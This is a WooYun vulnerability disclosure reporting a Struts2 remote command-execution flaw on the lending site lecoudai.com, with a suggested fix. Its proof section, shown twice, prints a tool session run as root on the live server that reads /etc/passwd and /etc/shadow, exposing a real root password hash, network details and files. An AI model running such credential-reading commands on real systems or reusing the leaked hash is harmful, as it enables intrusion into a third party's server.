当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168876

漏洞标题:乐凑贷P2P平台存在struts2命令执行漏洞

相关厂商:乐凑贷

漏洞作者: dloved

提交时间:2016-01-13 16:09

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-02-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

乐凑贷首家最大最安全的P2P网络投资理财、网络贷款平台,存在struts2命令执行漏洞,可任意执行命令;但平台有相关防护手段,检测到后,会将IP拉入黑名单,限制访问该网站。

详细说明:

漏洞链接

http://www.lecoudai.com/index.action


11111.png


Whoami: root
WebPath: /mnt2/lcd/WebRoot-pc
OS.Name: Linux
OS.Version: 2.6.32-431.23.3.el6.x86_64
Java.Home: /root/jdk1.6.0_45/jre
Java.Version: 1.6.0_45
OS.arch: amd64
User.Name: root
User.Home: /root
User.Dir: /root
Java.Class.Path: :/mnt/lcd/apache-tomcat-6.0.18-pc/bin/bootstrap.jar
Java.IO.Tmpdir: /mnt/lcd/apache-tomcat-6.0.18-pc/temp


K8cmd-> ifconfig
====================================================================================================================================
eth0 Link encap:Ethernet HWaddr 00:16:3E:00:1B:A8
inet addr:10.171.113.239 Bcast:10.171.119.255 Mask:255.255.248.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5253551 errors:0 dropped:0 overruns:0 frame:0
TX packets:896113 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1286062662 (1.1 GiB) TX bytes:1003121610 (956.6 MiB)
Interrupt:164
eth1 Link encap:Ethernet HWaddr 00:16:3E:00:46:9D
inet addr:182.92.97.174 Bcast:182.92.99.255 Mask:255.255.252.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:41758480 errors:0 dropped:0 overruns:0 frame:0
TX packets:932787 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1799216138 (1.6 GiB) TX bytes:1353514181 (1.2 GiB)
Interrupt:163
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:207528 errors:0 dropped:0 overruns:0 frame:0
TX packets:207528 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:621199770 (592.4 MiB) TX bytes:621199770 (592.4 MiB)


K8cmd-> cat /etc/passwd
====================================================================================================================================
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
nginx:x:498:499:Nginx web server:/var/lib/nginx:/sbin/nologin


K8cmd-> cat /etc/shadow
====================================================================================================================================
root:$6$7mDyuzXE$kybTSdnm17WXo.HLy1G.C41FWft0Zs/3q9la4XIak8VTMUf.YZrm/jE9vzWWIcfHaUIAFBvMFNSHiiCCiyctJ0:16684:0:99999:7:::
bin:*:15980:0:99999:7:::
daemon:*:15980:0:99999:7:::
adm:*:15980:0:99999:7:::
lp:*:15980:0:99999:7:::
sync:*:15980:0:99999:7:::
shutdown:*:15980:0:99999:7:::
halt:*:15980:0:99999:7:::
mail:*:15980:0:99999:7:::
uucp:*:15980:0:99999:7:::
operator:*:15980:0:99999:7:::
games:*:15980:0:99999:7:::
gopher:*:15980:0:99999:7:::
ftp:*:15980:0:99999:7:::
nobody:*:15980:0:99999:7:::
dbus:!!:16296::::::
vcsa:!!:16296::::::
abrt:!!:16296::::::
haldaemon:!!:16296::::::
ntp:!!:16296::::::
saslauth:!!:16296::::::
postfix:!!:16296::::::
sshd:!!:16296::::::
tcpdump:!!:16296::::::
nscd:!!:16296::::::
nginx:!!:16664::::::


K8cmd-> ls -l
====================================================================================================================================
??? 21988
-rw-r--r-- 1 root root 7462611 5? 8 2015 apache-tomcat-6.0.44.zip
-rw-r--r-- 1 root root 16 9? 7 16:35 bak.jsp
-rwxr-xr-x 1 root root 4 12? 13 00:34 idus.log
drwxr-xr-x 8 root root 4096 3? 27 2013 jdk1.6.0_45
drwxr-xr-x 9 1001 1001 4096 8? 17 16:32 nginx-1.8.0
-rw-r--r-- 1 root root 832104 4? 21 2015 nginx-1.8.0.tar.gz
drwxr-xr-x 2 root root 4096 10? 14 18:44 proxy-2.2.4
-rw-r--r-- 1 root root 81920 4? 13 2012 proxy.tar
-rw-r--r-- 1 root root 3456 8? 19 15:16 sendSMS.class
-rw-r--r-- 1 root root 2012 8? 19 15:18 sendSMS.zip
-rwxr-xr-x 1 root root 4 12? 13 00:34 vga.conf
-rw-r--r-- 1 root root 14100112 7? 11 2015 ??.rar


该服务其直接配置了外网地址182.92.97.174,且可开放了22端口服务,可外网ssh服务。

2222.png


由于恶意访问,IP被限制,未能完成相关测试工作;同时,可创建账号、上传相关后门得到webshell。
请尽快确认漏洞,进行修复。。。。

漏洞证明:

http://www.lecoudai.com/index.action


11111.png


Whoami: root
WebPath: /mnt2/lcd/WebRoot-pc
OS.Name: Linux
OS.Version: 2.6.32-431.23.3.el6.x86_64
Java.Home: /root/jdk1.6.0_45/jre
Java.Version: 1.6.0_45
OS.arch: amd64
User.Name: root
User.Home: /root
User.Dir: /root
Java.Class.Path: :/mnt/lcd/apache-tomcat-6.0.18-pc/bin/bootstrap.jar
Java.IO.Tmpdir: /mnt/lcd/apache-tomcat-6.0.18-pc/temp


K8cmd-> ifconfig
====================================================================================================================================
eth0 Link encap:Ethernet HWaddr 00:16:3E:00:1B:A8
inet addr:10.171.113.239 Bcast:10.171.119.255 Mask:255.255.248.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5253551 errors:0 dropped:0 overruns:0 frame:0
TX packets:896113 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1286062662 (1.1 GiB) TX bytes:1003121610 (956.6 MiB)
Interrupt:164
eth1 Link encap:Ethernet HWaddr 00:16:3E:00:46:9D
inet addr:182.92.97.174 Bcast:182.92.99.255 Mask:255.255.252.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:41758480 errors:0 dropped:0 overruns:0 frame:0
TX packets:932787 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1799216138 (1.6 GiB) TX bytes:1353514181 (1.2 GiB)
Interrupt:163
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:207528 errors:0 dropped:0 overruns:0 frame:0
TX packets:207528 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:621199770 (592.4 MiB) TX bytes:621199770 (592.4 MiB)


K8cmd-> cat /etc/passwd
====================================================================================================================================
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
nginx:x:498:499:Nginx web server:/var/lib/nginx:/sbin/nologin


K8cmd-> cat /etc/shadow
====================================================================================================================================
root:$6$7mDyuzXE$kybTSdnm17WXo.HLy1G.C41FWft0Zs/3q9la4XIak8VTMUf.YZrm/jE9vzWWIcfHaUIAFBvMFNSHiiCCiyctJ0:16684:0:99999:7:::
bin:*:15980:0:99999:7:::
daemon:*:15980:0:99999:7:::
adm:*:15980:0:99999:7:::
lp:*:15980:0:99999:7:::
sync:*:15980:0:99999:7:::
shutdown:*:15980:0:99999:7:::
halt:*:15980:0:99999:7:::
mail:*:15980:0:99999:7:::
uucp:*:15980:0:99999:7:::
operator:*:15980:0:99999:7:::
games:*:15980:0:99999:7:::
gopher:*:15980:0:99999:7:::
ftp:*:15980:0:99999:7:::
nobody:*:15980:0:99999:7:::
dbus:!!:16296::::::
vcsa:!!:16296::::::
abrt:!!:16296::::::
haldaemon:!!:16296::::::
ntp:!!:16296::::::
saslauth:!!:16296::::::
postfix:!!:16296::::::
sshd:!!:16296::::::
tcpdump:!!:16296::::::
nscd:!!:16296::::::
nginx:!!:16664::::::


K8cmd-> ls -l
====================================================================================================================================
??? 21988
-rw-r--r-- 1 root root 7462611 5? 8 2015 apache-tomcat-6.0.44.zip
-rw-r--r-- 1 root root 16 9? 7 16:35 bak.jsp
-rwxr-xr-x 1 root root 4 12? 13 00:34 idus.log
drwxr-xr-x 8 root root 4096 3? 27 2013 jdk1.6.0_45
drwxr-xr-x 9 1001 1001 4096 8? 17 16:32 nginx-1.8.0
-rw-r--r-- 1 root root 832104 4? 21 2015 nginx-1.8.0.tar.gz
drwxr-xr-x 2 root root 4096 10? 14 18:44 proxy-2.2.4
-rw-r--r-- 1 root root 81920 4? 13 2012 proxy.tar
-rw-r--r-- 1 root root 3456 8? 19 15:16 sendSMS.class
-rw-r--r-- 1 root root 2012 8? 19 15:18 sendSMS.zip
-rwxr-xr-x 1 root root 4 12? 13 00:34 vga.conf
-rw-r--r-- 1 root root 14100112 7? 11 2015 ??.rar


该服务其直接配置了外网地址182.92.97.174,且可开放了22端口服务,可外网ssh服务。

2222.png

修复方案:

对struts漏洞进行修复或升级。。。。。

版权声明:转载请注明来源 dloved@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝